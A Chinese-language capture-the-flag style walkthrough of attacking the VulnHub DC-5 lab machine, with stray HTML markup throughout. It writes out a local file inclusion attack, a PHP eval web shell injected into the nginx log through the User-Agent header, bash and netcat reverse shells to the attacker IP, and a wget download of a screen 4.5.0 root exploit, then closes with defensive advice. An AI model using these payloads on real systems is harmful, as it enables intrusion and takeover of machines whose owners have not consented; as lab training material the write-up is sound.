VulnHub靶机 DC-5 渗透测试详细教程<\/h1>

一、靶机环境准备<\/h2>

靶机下载<\/strong>：<\/p>

下载地址：https:\/\/download.vulnhub.com\/dc\/DC-5.zip<\/li>
将下载的ZIP文件解压后导入虚拟机软件(如VMware或VirtualBox)<\/li> <\/ul> <\/li>

网络配置<\/strong>：<\/p>

确保攻击机(Kali Linux)和靶机在同一网络段<\/li>
建议使用NAT或桥接模式<\/li> <\/ul> <\/li> <\/ol>
二、信息收集阶段<\/h2>
1. 主机发现<\/h3>
使用以下命令发现靶机IP：<\/p>
arp-scan -l <\/span><\/span># 或<\/span> <\/span><\/span>nmap -sn 192.168.1.0\/24 <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 扫描开放端口：<\/p> nmap -p- 192.168.43.192 <\/span><\/span><\/code><\/pre>典型结果会显示开放以下端口：<\/p> 80\/tcp (HTTP服务)<\/li> 111\/tcp (RPCbind)<\/li> 41237\/tcp (未知服务)<\/li> <\/ul> 详细服务扫描：<\/p> nmap -p80,111,41237 -sV -A 192.168.43.192 <\/span><\/span><\/code><\/pre>三、Web应用渗透<\/h2> 1. 目录爆破<\/h3> 使用dirsearch进行目录枚举：<\/p> dirsearch -u http:\/\/192.168.43.192 -i 200<\/span> <\/span><\/span><\/code><\/pre>发现的重要目录：<\/p> \/footer.php<\/li> \/thankyou.php<\/li> \/contact.php<\/li> <\/ul> 2. 文件包含漏洞发现<\/h3> 观察发现：<\/p> 访问\/footer.php和\/thankyou.php时，页面底部年份会变化<\/li> 这表明这些页面可能动态包含某个文件<\/li> <\/ul> 进一步目录爆破：<\/p> dirsearch -u http:\/\/192.168.43.192\/thankyou.php -e* -i 200<\/span> <\/span><\/span><\/code><\/pre>3. 文件包含漏洞利用<\/h3> 尝试读取\/etc\/passwd：<\/p> http:\/\/192.168.43.192\/thankyou.php?file=<\/span>\/etc\/passwd <\/span><\/span><\/code><\/pre>参数发现技巧：<\/p> wfuzz -w \/usr\/share\/wfuzz\/wordlist\/general\/common.txt http:\/\/192.168.43.192\/thankyou.php?FUZZ=<\/span>\/etc\/passwd <\/span><\/span><\/code><\/pre>四、获取初始Shell<\/h2> 1. 通过日志文件包含获取Web Shell<\/h3> 确定Web服务器为Nginx，尝试包含日志文件：<\/p> http:\/\/192.168.43.192\/thankyou.php?file=<\/span>\/var\/log\/nginx\/access.log <\/span><\/span><\/code><\/pre><\/li> 在User-Agent中插入PHP代码：<\/p> <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]);?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 使用curl或Burp Suite修改请求头：<\/p> curl -A "<?php @eval(\$_POST['cmd']);?>"<\/span> http:\/\/192.168.43.192\/ <\/span><\/span><\/code><\/pre><\/li> 验证PHP代码执行：<\/p> http:\/\/192.168.43.192\/thankyou.php?file=<\/span>\/var\/log\/nginx\/access.log&cmd=<\/span>whoami <\/span><\/span><\/code><\/pre><\/li> 使用蚁剑或其他Web Shell管理工具连接：<\/p> 连接URL：http:\/\/192.168.43.192\/thankyou.php?file=\/var\/log\/nginx\/access.log<\/li> 密码：cmd<\/li> <\/ul> <\/li> <\/ol> 2. 反弹Shell<\/h3> 在蚁剑虚拟终端尝试反弹Shell：<\/p> # 方法1：bash反弹<\/span> <\/span><\/span>bash -i >& \/dev\/tcp\/攻击机IP\/8888 0>&1<\/span> <\/span><\/span> <\/span><\/span># 方法2：nc反弹<\/span> <\/span><\/span>nc -e \/bin\/bash 攻击机IP 8888<\/span> <\/span><\/span><\/code><\/pre>攻击机监听：<\/p> nc -lvvp 8888<\/span> <\/span><\/span><\/code><\/pre>获取稳定Shell：<\/p> python -c "import pty;pty.spawn('\/bin\/bash')"<\/span> <\/span><\/span><\/code><\/pre>五、权限提升<\/h2> 1. 查找SUID权限文件<\/h3> find \/ -perm -u=<\/span>s -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre>发现关键文件：<\/p> \/usr\/bin\/screen-4.5.0<\/li> <\/ul> 2. 利用screen-4.5.0漏洞提权<\/h3> 搜索漏洞：<\/p> screen 4.5.0存在本地提权漏洞(CVE-2017-5618)<\/li> <\/ul> <\/li> 下载利用代码：<\/p> 攻击机开启HTTP服务： python3 -m http.server 8080<\/span> <\/span><\/span><\/code><\/pre><\/li> 靶机下载利用代码： wget http:\/\/攻击机IP:8080\/41154.sh <\/span><\/span>wget http:\/\/攻击机IP:8080\/41154.c <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 编译执行：<\/p> chmod u+x 41154.sh <\/span><\/span>.\/41154.sh <\/span><\/span><\/code><\/pre><\/li> 成功获取root权限<\/p> <\/li> <\/ol> 六、总结与防御建议<\/h2> 漏洞链分析：<\/h3> 文件包含漏洞(LFI) → Web Shell → 反弹Shell → SUID提权<\/li> <\/ol> 防御措施：<\/h3> 文件包含漏洞防御：<\/p> 禁用动态文件包含<\/li> 使用白名单限制包含文件<\/li> 设置open_basedir限制<\/li> <\/ul> <\/li> Web日志安全：<\/p> 日志文件不可被Web用户读取<\/li> 日志目录设置适当权限<\/li> <\/ul> <\/li> SUID权限管理：<\/p> 定期检查SUID\/SGID文件<\/li> 删除不必要的SUID权限<\/li> <\/ul> <\/li> 软件更新：<\/p> 及时更新存在漏洞的软件(如screen)<\/li> <\/ul> <\/li> <\/ol> 通过本教程，您应该已经掌握了从信息收集到权限提升的完整渗透测试流程，特别是文件包含漏洞的利用和SUID提权技术的实际应用。<\/p>